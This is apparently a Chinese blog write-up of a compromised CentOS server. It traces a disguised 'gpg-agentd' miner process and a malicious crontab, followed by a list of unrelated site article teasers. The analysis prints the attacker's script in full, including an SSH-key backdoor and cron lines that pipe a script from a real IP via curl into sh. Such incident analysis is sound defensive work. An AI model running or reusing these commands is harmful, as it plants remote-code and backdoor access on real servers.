[导读]0x00背景周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了...
0x00 背景
周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了!0x01 查找线索
服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。google了一下gpg,结果是:GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。
看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。继续ps eho command -p 23374netstat -pan | grep 23374
查看pid:23374进程启动路径和网络状况,也就是来到了图1的目录,到此已经找到了黑客留下的二进制可执行文件。接下来还有2个问题在等着我:1、文件是怎么上传的?
2、这个文件的目的是什么,或是黑客想干嘛?
history看一下,记录果然都被清掉了,没留下任何痕迹。继续命令more messages,看到了在半夜12点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务。crontab -e
果然,线索找到了。0x02 作案动机
上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。curl -fsSL 159.89.190.243/ash.php > ash.sh
脚本内容如下:uname -aidhostnamesetenforce 0 2>/dev/nullulimit -n 50000ulimit -u 50000crontab -r 2>/dev/nullrm -rf /var/spool/cron/* 2>/dev/nullmkdir -p /var/spool/cron/crontabs 2>/dev/nullmkdir -p /root/.ssh 2>/dev/nullecho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0 xigBIrdgo2p5nBtrpYZ2/GN3 ThY PNUqx redisX' > /root/.ssh/authorized_keysecho '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/rootecho '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/rootyum install -y bash 2>/dev/nullapt install -y bash 2>/dev/nullapt-get install -y bash 2>/dev/nullbash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null
大致分析一下该脚本的主要用途:首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多,关于ssh keys的文章可以参考这一篇文章SSH原理与运用。接下来安装bash,最后是继续下载第二个脚本bsh.php,并且执行。
继续下载并分析bsh.pbp,内容如下:sleep $( seq 3 7 | sort -R | head -n1 )cd /tmp || cd /var/tmpsleep 1mkdir -p .ICE-unix/...
本站声明: 本文章由作者或相关机构授权发布,目的在于传递更多信息,并不代表本站赞同其观点,本站亦不保证或承诺内容真实性等。需要转载请联系该专栏作者,如若文章内容侵犯您的权益,请及时联系本站删除。
双系统将是下述内容的主要介绍对象,通过这篇文章,小编希望大家可以对双系统的相关情况以及信息有所认识和了解,详细内容如下。
关键字:
双系统
Windows
Linux
安装Linux操作系统并不复杂,下面是一个大致的步骤指南,以帮助您完成安装。1. 下载Linux发行版:首先,您需要从Linux发行版官方网站下载最新的ISO镜像文件。
关键字:
Linux
操作系统
ISO镜像
计算机是由一堆硬件组成的,为了有限的控制这些硬件资源,于是就有了操作系统的产生,操作系统是软件子系统的一部分,是硬件基础上的第一层软件。
关键字:
Linux
操作系统
计算机
Linux操作系统是一套免费使用和自由传播的类Unix操作系统,通常被称为GNU/Linux。它是由林纳斯·托瓦兹在1991年首次发布的,并基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。Lin...
关键字:
Linux
操作系统
所谓进程间通信就是在不同进程之间传播或交换信息,它是一组编程接口,让程序员能够协调不同的进程,使之能在一个操作系统里同时运行,并相互传递、交换信息;还可以让一个程序能够在同一时间里处理许多用户的需求。
关键字:
Linux
进程通信
编程接口
串口通信作为一种最传统的通信方式,在工业自动化、通讯、控制等领域得到广泛使用。
关键字:
Linux
串口通信
通讯
2023年11月16日: MikroElektronika(MIKROE) ,作为一家通过提供基于成熟标准的创新式硬软件产品来大幅缩短开发时间的嵌入式解决方案公司,今天宣布推出一款基于单线设备的软硬件开源解决方案Cli...
关键字:
嵌入式
Linux
操作系统
Linux是一种免费使用和自由传播的类Unix操作系统,其内核由林纳斯·本纳第克特·托瓦兹于1991年10月5日首次发布。它主要受到Minix和Unix思想的启发,是一个基于POSIX的多用户、多任务、支持多线程和多CP...
关键字:
Linux
操作系统
本文中,小编将对嵌入式予以介绍,如果你想对它的详细情况有所认识,或者想要增进对它的了解程度,不妨请看以下内容哦。
关键字:
嵌入式
Linux
在这篇文章中,小编将为大家带来嵌入式 Linux的相关报道。如果你对本文即将要讲解的内容存在一定兴趣,不妨继续往下阅读哦。
关键字:
嵌入式
Linux
嵌入式 linux将是下述内容的主要介绍对象,通过这篇文章,小编希望大家可以对它的相关情况以及信息有所认识和了解,详细内容如下。
关键字:
嵌入式
嵌入式linux
Linux
在这篇文章中,小编将为大家带来Linux内核的相关报道。如果你对本文即将要讲解的内容存在一定兴趣,不妨继续往下阅读哦。
关键字:
嵌入式
Linux
内核
上海2023年9月21日 /美通社/ -- 由于在雇主品牌建设拥有优异表现,台达于9月15日在 “2023 HRoot 人力资本论坛·上海站”获颁“2023大中华区卓越雇...
关键字:
ROOT
MIDDOT
EXPLORING
——该收购旨在进一步扩大神经调控产品组合,为慢性腰疼患者提供更多治疗解决方案 马萨诸塞州马尔伯勒2023年9月20日 /美通社/ -- 波士顿科学公司(纽约证券交易所代码:BSX)宣布现已签订Relievant Med...
关键字:
SYSTEMS
医疗技术
EV
AN
上海2023年8月31日 /美通社/ -- 从《数据安全法》、《个人信息保护法》颁布实施以来,相关配套的法律、法规不断明确并细化要求,2023年6月又实施了《个人信息出境标准合同办法》。数据跨境合规已成为跨国药企目前纷纷...
关键字:
研讨会
EV
CHINA
亚马逊
上海2023年8月24日 /美通社/ -- 云顶新耀(HKEX 1952.HK),一家专注于创新药及疫苗开发、制造及商业化的生物制药公司,今日公布2023年度中期业绩报告(截至2023年6月30日)及业务进展。...
关键字:
BSP
NDA
EV
新加坡
(全球TMT2023年8月18日讯)人工智能驱动的全球企业云通信、视频会议、协作和联络中心解决方案供应商RingCentral,Inc宣布收购Hopin的部分资产。Hopin是一家领先的在线观众参与技术提供商,这次所收...
关键字:
CENTRAL
PI
SESSION
EV
不一样的人力资源日818 HR Day 上海2023年8月18日 /美通社/ -- 每年的8月18日,是属于人力资源工作者的节日。多年以来,中智一直致力于提升人力资本在企业...
关键字:
AI
MIDDOT
BSP
ROOT
完善视频产品组合,以满足企业通信需求,包括会议、网络研讨会、会议室,以及现在的虚拟和混合活动。 加利福尼亚贝尔蒙特2023年8月18日 /美通社/ -- 人工智能驱动的全球企业云通信、视频会议、协作和联络中心解决方案的...
关键字:
CENTRAL
PI
EV
SESSION
2023年8月14日 – 专注于引入新品推动行业创新™的电子元器件代理商贸泽电子 (Mouser Electronics)宣布将于8月23-25日亮相2023 ELEXCON深圳国际电子展暨嵌入式系统展(展位号:H1,...
关键字:
嵌入式系统
EV
AI